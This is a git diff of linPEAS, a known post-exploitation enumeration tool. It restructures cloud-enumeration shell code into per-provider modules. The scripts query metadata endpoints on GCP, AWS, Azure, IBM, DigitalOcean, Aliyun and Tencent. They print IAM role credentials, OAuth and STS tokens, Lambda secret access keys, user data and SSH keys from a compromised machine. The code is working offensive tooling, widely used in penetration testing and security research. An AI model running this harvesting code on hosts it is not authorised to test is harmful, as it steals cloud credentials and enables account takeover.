-        print_3title "Interfaces"
-        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
-            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
-            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
-            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
-            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
-            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
-            echo "  ==============  "
-        done
-        
-        echo ""
-        print_3title "User Data"
-        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
-        echo ""
-
-        echo ""
-        print_3title "Service Accounts"
-        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
-            echo "  Name: $sa"
-            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
-            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
-            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
-            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
-            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
-            echo "  ==============  "
-        done
-    fi
-fi
-
-
-if [ "$is_aws_ecs" = "Yes" ]; then
-    print_2title "AWS ECS Enumeration"
-    
-    aws_ecs_req=""
-    if [ "$(command -v curl)" ]; then
-        aws_ecs_req='curl -s -f'
-    elif [ "$(command -v wget)" ]; then
-        aws_ecs_req='wget -q -O -'
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-    if [ "$aws_ecs_metadata_uri" ]; then
-        print_3title "Container Info"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
-        echo ""
-        
-        print_3title "Task Info"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
-        echo ""
-    else
-        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
-    fi
-
-    if [ "$aws_ecs_service_account_uri" ]; then
-        print_3title "IAM Role"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
-        echo ""
-    else
-        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
-    fi
-fi
-
-if [ "$is_aws_ec2" = "Yes" ]; then
-    print_2title "AWS EC2 Enumeration"
-    
-    HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
-    URL="http://169.254.169.254/latest/meta-data"
-    
-    aws_req=""
-    if [ "$(command -v curl)" ]; then
-        aws_req="curl -s -f -H '$HEADER'"
-    elif [ "$(command -v wget)" ]; then
-        aws_req="wget -q -O - -H '$HEADER'"
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-  
-    if [ "$aws_req" ]; then
-        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
-        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
-        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
-        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
-        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
-        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
-
-        echo ""
-        print_3title "Account Info"
-        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
-
-        echo ""
-        print_3title "Network Info"
-        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
-          echo "Mac: $mac"
-          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
-          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
-          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
-          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
-          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
-          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
-          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
-          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
-          echo ""
-        done
-
-        echo ""
-        print_3title "IAM Role"
-        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
-        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
-          echo "Role: $role"
-          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
-          echo ""
-        done
-        
-        echo ""
-        print_3title "User Data"
-        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
-        
-        echo ""
-        echo "EC2 Security Credentials"
-        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
-        
-        print_3title "SSM Runnig"
-        ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
-    fi
-fi
-
-if [ "$is_aws_lambda" = "Yes" ]; then
-  print_2title "AWS Lambda Enumeration"
-  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
-  printf "Region: "; env | grep AWS_REGION
-  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
-  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
-  printf "Session token: "; env | grep AWS_SESSION_TOKEN
-  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
-  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
-  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
-fi
-
-if [ "$is_aws_codebuild" = "Yes" ]; then
-  print_2title "AWS Codebuild Enumeration"
-
-  aws_req=""
-  if [ "$(command -v curl)" ]; then
-      aws_req="curl -s -f"
-  elif [ "$(command -v wget)" ]; then
-      aws_req="wget -q -O -"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-      echo "The addresses are in /codebuild/output/tmp/env.sh"
-  fi
-
-  if [ "$aws_req" ]; then
-    print_3title "Credentials"
-    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
-    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
-    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
-
-    print_3title "Container Info"
-    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
-    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
-  fi
-fi
-
-if [ "$is_do" = "Yes" ]; then
-  print_2title "DO Droplet Enumeration"
-
-  do_req=""
-  if [ "$(command -v curl)" ]; then
-      do_req='curl -s -f '
-  elif [ "$(command -v wget)" ]; then
-      do_req='wget -q -O - '
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$do_req" ]; then
-    URL="http://169.254.169.254/metadata"
-    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
-    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
-    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
-    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
-    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
-    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
-    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
-    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
-    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
-    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
-  fi
-fi
-
-if [ "$is_ibm_vm" = "Yes" ]; then
-  print_2title "IBM Cloud Enumeration"
-
-  if ! [ "$IBM_TOKEN" ]; then
-    echo "Couldn't get the metdata token:("
-
-  else
-    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
-    ACCEPT_HEADER="Accept: application/json"
-    URL="http://169.254.169.254/latest/meta-data"
-    
-    ibm_req=""
-    if [ "$(command -v curl)" ]; then
-        ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
-    elif [ "$(command -v wget)" ]; then
-        ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-    if [ "$ibm_req" ]; then
-      print_3title "Instance Details"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
-
-      print_3title "Keys and User data"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
-
-      print_3title "Placement Groups"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
-
-      print_3title "IAM credentials"
-      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
-    fi
-  fi
-
-fi
-
-if [ "$is_az_vm" = "Yes" ]; then
-  print_2title "Azure VM Enumeration"
-
-  HEADER="Metadata:true"
-  URL="http://169.254.169.254/metadata"
-  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
-  
-  az_req=""
-  if [ "$(command -v curl)" ]; then
-      az_req="curl -s -f -H '$HEADER'"
-  elif [ "$(command -v wget)" ]; then
-      az_req="wget -q -O - -H '$HEADER'"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$az_req" ]; then
-    print_3title "Instance details"
-    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
-
-    print_3title "Load Balancer details"
-    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
-
-    print_3title "Management token"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
-
-    print_3title "Graph token"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
-    
-    print_3title "Vault token"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
-
-    print_3title "Storage token"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
-  fi
-fi
-
-if [ "$check_az_app" = "Yes" ]; then
-  print_2title "Azure App Service Enumeration"
-  echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
-
-  HEADER="secret:$IDENTITY_HEADER"
-
-  az_req=""
-  if [ "$(command -v curl)" ]; then
-      az_req="curl -s -f -H '$HEADER'"
-  elif [ "$(command -v wget)" ]; then
-      az_req="wget -q -O - -H '$HEADER'"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$az_req" ]; then
-    print_3title "Management token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
-
-    print_3title "Graph token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
-    
-    print_3title "Vault token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
-
-    print_3title "Storage token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/10_IBM_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/10_IBM_Cloud.sh
@@ -0,0 +1,52 @@
+# Title: Cloud - IBM Cloud
+# ID: CL_IBM_Cloud
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: IBM Cloud Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_ibm_vm, print_2title, print_3title
+# Global Variables: $IBM_TOKEN, $is_ibm_vm
+# Initial Functions: check_ibm_vm
+# Generated Global Variables: $TOKEN_HEADER, $ACCEPT_HEADER, $URL, $ibm_req
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$is_ibm_vm" = "Yes" ]; then
+  print_2title "IBM Cloud Enumeration"
+
+  if ! [ "$IBM_TOKEN" ]; then
+    echo "Couldn't get the metadata token:("
+
+  else
+    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
+    ACCEPT_HEADER="Accept: application/json"
+    URL="http://169.254.169.254/latest/meta-data"
+    
+    ibm_req=""
+    if [ "$(command -v curl || echo -n '')" ]; then
+        ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    elif [ "$(command -v wget || echo -n '')" ]; then
+        ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    if [ "$ibm_req" ]; then
+      print_3title "Instance Details"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
+
+      print_3title "Keys and User data"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
+
+      print_3title "Placement Groups"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
+
+      print_3title "IAM credentials"
+      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
+    fi
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/11_Ali_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/11_Ali_Cloud.sh
@@ -0,0 +1,98 @@
+# Title: Cloud - Ali Cloud
+# ID: CL_Ali_Cloud
+# Author: Esonhugh
+# Last Update: 22-01-2024
+# Description: Ali Cloud Platform Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_3title, print_info
+# Global Variables: $is_aliyun_ecs
+# Initial Functions: check_aliyun_ecs
+# Generated Global Variables: $aliyun_req, $aliyun_token, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_aliyun_owner_account, $i_region_id, $i_zone_id, $i_pub_ipv4, $i_priv_ipv4, $net_dns, $mac, $sa, $key
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+
+if [ "$is_aliyun_ecs" = "Yes" ]; then
+  aliyun_req=""
+  aliyun_token=""
+  if [ "$(command -v curl)" ]; then 
+    aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
+    aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"'
+  elif [ "$(command -v wget)" ]; then
+    aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
+    aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'
+  else 
+    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$aliyun_token" ]; then
+    print_2title "Aliyun ECS Enumeration"
+    print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata"
+
+    echo ""
+    print_3title "Instance Info"
+    i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname)
+    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
+    i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id)
+    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
+    # no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId
+    i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name)
+    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
+    i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type)
+    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
+    i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)
+    [ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account"
+    i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id)
+    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
+    i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id)
+    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
+
+    echo ""
+    print_3title "Network Info"
+    i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4)
+    [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4"
+    i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4)
+    [ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4"
+    net_dns=$(eval $aliyun_req  http://100.100.100.200/latest/meta-data/dns-conf/nameservers)
+    [ "$net_dns" ] && echo "DNS: $net_dns"
+    
+    echo "========"
+    for mac in $(eval $aliyun_req  http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do
+      echo "  Mac: $mac"
+      echo "  Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id)
+      echo "  Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask)
+      echo "  Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id)
+      echo "  Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block)
+      echo "  Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks)
+      echo "  Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id)
+      echo "  Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block)
+      echo "  Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block)
+      echo "  Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s)
+      echo "  Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s)
+      echo "  Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway)
+      echo "  Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway)
+      echo "======="
+    done
+
+    echo ""
+    print_3title "Service account "
+    for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do 
+      echo "  Name: $sa"
+      echo "  STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa")
+      echo "  =============="
+    done
+
+    echo ""
+    print_3title "Possbile admin ssh Public keys"
+    for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do
+      echo "  Name: $key"
+      echo "  Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key")
+      echo "  =============="
+    done
+
+
+  fi
+fi
+
--- a/linPEAS/builder/linpeas_parts/3_cloud/12_Tencent_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/12_Tencent_Cloud.sh
@@ -0,0 +1,88 @@
+# Title: Cloud - Tencent Cloud
+# ID: CL_Tencent_Cloud
+# Author: Shadowabi
+# Last Update: 22-01-2024
+# Description: Tencent Cloud Platform Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_3title, print_info
+# Global Variables: $is_tencent_cvm
+# Initial Functions: check_tencent_cvm
+# Generated Global Variables: $tencent_req, $i_tencent_owner_account, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_region_id, $i_zone_id, $mac_tencent, $lipv4, $sa_tencent, $key_tencent
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_tencent_cvm" = "Yes" ]; then
+  tencent_req=""
+  if [ "$(command -v curl)" ]; then 
+    tencent_req='curl --connect-timeout 2 -sfkG'
+  elif [ "$(command -v wget)" ]; then
+    tencent_req='wget -q --timeout 2 --tries 1  -O -'
+  else 
+    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  
+    print_2title "Tencent CVM Enumeration"
+    print_info "https://cloud.tencent.com/document/product/213/4934"
+    # Todo: print_info "Hacktricks Documents needs to be updated"
+
+    echo ""
+    print_3title "Instance Info"
+    i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id)
+    [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account"
+    i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname)
+    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
+    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id)
+    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
+    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)
+    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
+    i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name)
+    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
+    i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type)
+    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
+    i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region)
+    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
+    i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone)
+    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
+
+    echo ""
+    print_3title "Network Info"
+    for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do
+      echo "  Mac: $mac_tencent"
+      echo "  Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4)
+      echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s)
+      echo "  Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id)
+      echo "  Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id)
+      
+      for lipv4 in $(eval $tencent_req  http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do
+        echo "  Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4)
+        echo "  Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway)
+        echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4)
+        echo "  Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode)
+        echo "  Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask)
+      done
+    echo "======="
+    done
+
+    echo ""
+    print_3title "Service account "
+    for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do 
+      echo "  Name: $sa_tencent"
+      echo "  STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent")
+      echo "  =============="
+    done
+
+    echo ""
+    print_3title "Possbile admin ssh Public keys"
+    for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do
+      echo "  Name: $key_tencent"
+      echo "  Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key")
+      echo "  =============="
+    done
+
+    echo ""
+    print_3title "User Data"
+    eval $tencent_req http://169.254.0.23/latest/user-data; echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
@@ -0,0 +1,30 @@
+# Title: Cloud - Check if in cloud
+# ID: CL_Check_if_in_cloud
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check if the current system is inside a cloud environment
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
+# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
+# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_aliyun_ecs, check_tencent_cvm
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+
+echo ""
--- a/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
@@ -0,0 +1,79 @@
+# Title: Cloud - AWS EC2
+# ID: CL_AWS_EC2
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: AWS EC2 Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_ec2, exec_with_jq, print_2title, print_3title
+# Global Variables: $is_aws_ec2
+# Initial Functions: check_aws_ec2
+# Generated Global Variables: $aws_req, $HEADER, $URL, $mac, $role
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
